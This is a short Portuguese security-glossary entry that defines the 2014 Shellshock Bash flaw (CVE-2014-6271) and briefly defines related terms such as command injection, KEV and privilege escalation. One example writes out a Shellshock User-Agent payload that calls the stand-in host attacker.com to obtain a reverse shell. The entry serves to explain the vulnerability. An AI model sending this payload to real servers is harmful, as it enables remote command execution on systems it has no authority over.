Vulnerabilidades
Shellshock (CVE-2014-6271)
Também conhecido como: Bashdoor, CVE-2014-6271
Definição
Vulnerabilidade de 2014 no GNU Bash que permitia executar comandos arbitrários ao definir variáveis de ambiente especialmente construídas e passá-las ao Bash por outros programas.
Exemplos
- Enviar User-Agent () { :; }; /bin/curl attacker.com a um endpoint Bash-CGI para obter shell reversa.
- Explorar um cliente DHCP que exporta strings de opção para o ambiente de um script hook em Bash.
Termos relacionados
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
Catálogo público que atribui um identificador único a cada vulnerabilidade divulgada para que possa ser referenciada de forma inequívoca em toda a indústria.
Vulnerabilidade explorada conhecida (KEV)
CVE que a CISA dos EUA confirma estar ativamente a ser explorada e adiciona ao seu catálogo público KEV, acionando prazos de remediação para agências federais.
Trojan de acesso remoto (RAT)
Malware que dá ao atacante controlo encoberto e interativo de um dispositivo infetado, semelhante a uma ferramenta escondida de administração remota.
Exploit
Pedaço de código, dados ou técnica que tira partido de uma vulnerabilidade para causar comportamento indesejado, como execução de código, escalada de privilégios ou divulgação de informação.
Escalada de privilégios
Classe de vulnerabilidades que permite a um atacante obter permissões superiores às concedidas inicialmente, por exemplo passar de utilizador normal a administrador.